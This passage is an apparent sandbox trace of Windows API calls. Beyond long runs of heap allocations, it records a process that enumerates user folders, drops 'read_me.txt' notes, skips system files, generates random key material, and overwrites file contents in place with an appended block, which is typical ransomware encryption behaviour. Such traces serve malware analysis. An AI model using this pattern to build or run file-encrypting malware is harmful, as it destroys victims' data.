hHeap=0x4f10000) returned 1 [0083.182] GetProcessHeap () returned 0x4f10000 [0083.182] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.183] GetProcessHeap () returned 0x4f10000 [0083.183] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.183] GetProcessHeap () returned 0x4f10000 [0083.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.183] GetProcessHeap () returned 0x4f10000 [0083.183] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.183] GetProcessHeap () returned 0x4f10000 [0083.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.183] GetProcessHeap () returned 0x4f10000 [0083.183] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.183] GetProcessHeap () returned 0x4f10000 [0083.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.183] GetProcessHeap () returned 0x4f10000 [0083.183] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.183] GetProcessHeap () returned 0x4f10000 [0083.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.183] GetProcessHeap () returned 0x4f10000 [0083.183] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.183] GetProcessHeap () returned 0x4f10000 [0083.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.183] GetProcessHeap () returned 0x4f10000 [0083.183] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.183] GetProcessHeap () returned 0x4f10000 [0083.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.183] GetProcessHeap () returned 0x4f10000 [0083.183] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.183] GetProcessHeap () returned 0x4f10000 [0083.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.183] GetProcessHeap () returned 0x4f10000 [0083.183] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.184] GetProcessHeap () returned 0x4f10000 [0083.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.184] GetProcessHeap () returned 0x4f10000 [0083.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.184] GetProcessHeap () returned 0x4f10000 [0083.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.184] GetProcessHeap () returned 0x4f10000 [0083.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.184] GetProcessHeap () returned 0x4f10000 [0083.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.184] GetProcessHeap () returned 0x4f10000 [0083.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.184] GetProcessHeap () returned 0x4f10000 [0083.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.184] GetProcessHeap () returned 0x4f10000 [0083.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.184] GetProcessHeap () returned 0x4f10000 [0083.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.184] GetProcessHeap () returned 0x4f10000 [0083.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.184] GetProcessHeap () returned 0x4f10000 [0083.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.184] GetProcessHeap () returned 0x4f10000 [0083.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.184] GetProcessHeap () returned 0x4f10000 [0083.185] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.185] GetProcessHeap () returned 0x4f10000 [0083.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.185] GetProcessHeap () returned 0x4f10000 [0083.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.185] GetProcessHeap () returned 0x4f10000 [0083.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.185] GetProcessHeap () returned 0x4f10000 [0083.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.185] GetProcessHeap () returned 0x4f10000 [0083.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.185] SetFilePointerEx (in: hFile=0x914, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.185] WriteFile (in: hFile=0x914, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0083.185] WriteFile (in: hFile=0x914, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0083.185] GetProcessHeap () returned 0x4f10000 [0083.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0083.185] GetProcessHeap () returned 0x4f10000 [0083.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.185] GetProcessHeap () returned 0x4f10000 [0083.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.185] CloseHandle (hObject=0x914) returned 1 [0083.186] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 101 [0083.186] GetProcessHeap () returned 0x4f10000 [0083.186] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b20098 [0083.186] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\*") returned 42 [0083.186] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x2000002, ftCreationTime.dwLowDateTime=0x7d04758, ftCreationTime.dwHighDateTime=0x59000158, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x84001d, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x80, nFileSizeHigh=0x0, nFileSizeLow=0xec08c024, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="毰ߏ", cAlternateFileName="")) returned 0xffffffff [0083.186] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\read_me.txt") returned 52 [0083.186] GetProcessHeap () returned 0x4f10000 [0083.186] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b20098 | out: hHeap=0x4f10000) returned 1 [0083.186] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 102 [0083.186] GetProcessHeap () returned 0x4f10000 [0083.186] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b300a0 | out: hHeap=0x4f10000) returned 1 [0083.186] GetProcessHeap () returned 0x4f10000 [0083.186] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8cf0080 [0083.187] wnsprintfW (in: pszDest=0x8cf0080, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\*") returned 32 [0083.187] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x24ed3f00, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24ed3f00, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName=".", cAlternateFileName="")) returned 0x7cfe768 [0083.187] wnsprintfW (in: pszDest=0x8cf0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\.") returned 32 [0083.187] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x24ed3f00, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24ed3f00, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="..", cAlternateFileName="")) returned 1 [0083.187] wnsprintfW (in: pszDest=0x8cf0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\..") returned 33 [0083.187] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0083.188] wnsprintfW (in: pszDest=0x8cf0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini") returned 42 [0083.188] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini" (normalized: "c:\\users\\default\\downloads\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90c [0083.198] StrStrW (lpFirst="desktop.ini", lpSrch="read_me.txt") returned 0x0 [0083.198] StrStrW (lpFirst="desktop.ini", lpSrch="autoexec.bat") returned 0x0 [0083.198] StrStrW (lpFirst="desktop.ini", lpSrch="desktop.ini") returned="desktop.ini" [0083.198] CloseHandle (hObject=0x90c) returned 1 [0083.199] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24ed3f00, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24ed3f00, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24ed3f00, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0083.199] wnsprintfW (in: pszDest=0x8cf0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\read_me.txt") returned 42 [0083.199] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\read_me.txt" (normalized: "c:\\users\\default\\downloads\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90c [0083.199] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0083.199] CloseHandle (hObject=0x90c) returned 1 [0083.199] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24ed3f00, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24ed3f00, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24ed3f00, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0083.199] FindClose (in: hFindFile=0x7cfe768 | out: hFindFile=0x7cfe768) returned 1 [0083.199] wnsprintfW (in: pszDest=0x8cf0080, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\read_me.txt") returned 42 [0083.199] GetProcessHeap () returned 0x4f10000 [0083.199] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8cf0080 | out: hHeap=0x4f10000) returned 1 [0083.199] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 103 [0083.199] GetProcessHeap () returned 0x4f10000 [0083.199] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c40018 | out: hHeap=0x4f10000) returned 1 [0083.234] SetFilePointerEx (in: hFile=0x924, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.234] ReadFile (in: hFile=0x924, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0083.234] SetFilePointerEx (in: hFile=0x924, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.234] GetProcessHeap () returned 0x4f10000 [0083.234] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.234] GetProcessHeap () returned 0x4f10000 [0083.234] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.234] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.234] GetProcessHeap () returned 0x4f10000 [0083.234] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0083.234] ReadFile (in: hFile=0x924, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1e6, lpOverlapped=0x0) returned 1 [0083.241] SetFilePointerEx (in: hFile=0x924, liDistanceToMove=0xfffffe1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.241] WriteFile (in: hFile=0x924, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1e6, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1e6, lpOverlapped=0x0) returned 1 [0083.241] GetProcessHeap () returned 0x4f10000 [0083.241] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.241] GetProcessHeap () returned 0x4f10000 [0083.241] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.241] GetProcessHeap () returned 0x4f10000 [0083.241] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.241] GetProcessHeap () returned 0x4f10000 [0083.241] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.241] GetProcessHeap () returned 0x4f10000 [0083.241] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.241] GetProcessHeap () returned 0x4f10000 [0083.241] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.241] GetProcessHeap () returned 0x4f10000 [0083.241] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.241] GetProcessHeap () returned 0x4f10000 [0083.241] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.241] GetProcessHeap () returned 0x4f10000 [0083.241] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.241] GetProcessHeap () returned 0x4f10000 [0083.241] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.241] GetProcessHeap () returned 0x4f10000 [0083.241] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.241] GetProcessHeap () returned 0x4f10000 [0083.241] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.241] GetProcessHeap () returned 0x4f10000 [0083.241] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.241] GetProcessHeap () returned 0x4f10000 [0083.241] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.241] GetProcessHeap () returned 0x4f10000 [0083.241] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.241] GetProcessHeap () returned 0x4f10000 [0083.242] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.242] GetProcessHeap () returned 0x4f10000 [0083.242] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.242] GetProcessHeap () returned 0x4f10000 [0083.242] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.242] GetProcessHeap () returned 0x4f10000 [0083.242] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.242] GetProcessHeap () returned 0x4f10000 [0083.242] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.242] GetProcessHeap () returned 0x4f10000 [0083.242] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.242] GetProcessHeap () returned 0x4f10000 [0083.242] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.242] GetProcessHeap () returned 0x4f10000 [0083.242] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.242] GetProcessHeap () returned 0x4f10000 [0083.242] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.242] GetProcessHeap () returned 0x4f10000 [0083.242] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.242] GetProcessHeap () returned 0x4f10000 [0083.242] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.242] GetProcessHeap () returned 0x4f10000 [0083.242] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.242] GetProcessHeap () returned 0x4f10000 [0083.242] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.242] GetProcessHeap () returned 0x4f10000 [0083.242] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.242] GetProcessHeap () returned 0x4f10000 [0083.242] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.242] GetProcessHeap () returned 0x4f10000 [0083.242] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.242] GetProcessHeap () returned 0x4f10000 [0083.242] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.242] GetProcessHeap () returned 0x4f10000 [0083.242] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.242] GetProcessHeap () returned 0x4f10000 [0083.242] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.242] GetProcessHeap () returned 0x4f10000 [0083.242] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.243] GetProcessHeap () returned 0x4f10000 [0083.243] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.243] GetProcessHeap () returned 0x4f10000 [0083.243] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.243] GetProcessHeap () returned 0x4f10000 [0083.243] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.243] GetProcessHeap () returned 0x4f10000 [0083.243] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.243] GetProcessHeap () returned 0x4f10000 [0083.243] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.243] GetProcessHeap () returned 0x4f10000 [0083.243] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.243] GetProcessHeap () returned 0x4f10000 [0083.243] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.243] GetProcessHeap () returned 0x4f10000 [0083.243] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.243] GetProcessHeap () returned 0x4f10000 [0083.243] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.243] GetProcessHeap () returned 0x4f10000 [0083.243] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.243] GetProcessHeap () returned 0x4f10000 [0083.243] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.243] GetProcessHeap () returned 0x4f10000 [0083.243] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.243] GetProcessHeap () returned 0x4f10000 [0083.243] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.243] GetProcessHeap () returned 0x4f10000 [0083.243] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.243] GetProcessHeap () returned 0x4f10000 [0083.243] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.243] GetProcessHeap () returned 0x4f10000 [0083.243] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.243] GetProcessHeap () returned 0x4f10000 [0083.243] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.243] GetProcessHeap () returned 0x4f10000 [0083.243] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.244] GetProcessHeap () returned 0x4f10000 [0083.244] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.244] GetProcessHeap () returned 0x4f10000 [0083.244] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.244] GetProcessHeap () returned 0x4f10000 [0083.244] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.244] GetProcessHeap () returned 0x4f10000 [0083.244] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.244] GetProcessHeap () returned 0x4f10000 [0083.244] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.244] GetProcessHeap () returned 0x4f10000 [0083.244] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.244] GetProcessHeap () returned 0x4f10000 [0083.244] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.244] GetProcessHeap () returned 0x4f10000 [0083.244] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.244] GetProcessHeap () returned 0x4f10000 [0083.244] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.244] GetProcessHeap () returned 0x4f10000 [0083.244] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.244] GetProcessHeap () returned 0x4f10000 [0083.244] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.244] GetProcessHeap () returned 0x4f10000 [0083.244] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.244] GetProcessHeap () returned 0x4f10000 [0083.244] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.244] GetProcessHeap () returned 0x4f10000 [0083.244] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.244] GetProcessHeap () returned 0x4f10000 [0083.245] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.245] GetProcessHeap () returned 0x4f10000 [0083.245] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.245] GetProcessHeap () returned 0x4f10000 [0083.245] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.245] GetProcessHeap () returned 0x4f10000 [0083.245] RtlAllocateHeap 